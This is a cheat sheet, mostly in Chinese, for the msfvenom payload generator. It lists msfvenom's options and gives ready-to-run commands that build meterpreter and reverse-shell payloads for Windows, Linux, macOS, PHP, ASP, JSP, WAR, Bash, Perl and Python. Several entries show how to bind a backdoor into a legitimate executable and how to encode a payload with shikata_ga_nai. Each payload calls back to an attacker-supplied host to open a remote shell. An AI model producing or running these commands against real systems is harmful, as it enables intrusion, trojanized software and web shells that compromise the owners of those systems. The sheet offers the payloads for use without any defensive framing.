1. –p (- -payload-options)
(- -payload-options 列出payload选项)
2. –l
查看所有payload encoder nops。
3. –f (- -help-formats)
(- -help-formats 列出所有文件格式)
Executable formats:
asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war
Transform formats:
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
4. –e
5. –a (- -platform – -help-platforms)
x86 | x64 | x86_64
windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe
6. –o
7. –s
8. –b
避免使用的字符 例如:不使用 ‘\0f’。
9. –i
10. –c
11. –x | -k
捆绑。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。
12. 普通生成
msfvenom -p <payload> <payload options> -f <format> -o <path>
msfvenom –p windows/meterpreter/reverse_tcp –f exe –o C:\back.exe
13. 编码处理型
msfvenom -p <payload> -e <encoder > -i <encoder times> -n <nopsled> -f <format> -o <path> msfvenom –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:\back.exe
14. 捆绑
Msfvenom –p windows/meterpreter/reverse_tcp –platform windows –a x86 –x C:\nomal.exe –k –f exe –o C:\shell.exe
15. Windows
Msfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:\back.exe Msfvenom –platform windows –a x86 –p windows/x64/meterpreter/reverse_tcp –f exe –o C:\back.exe
16. Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
17. MAC
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
18. PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
19. Asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
20. Aspx
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx
21. JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
22. War
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
23. Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On>-f raw > shell.sh
24. Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
25. Python
msfvenom -p python/meterpreter/reverser_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py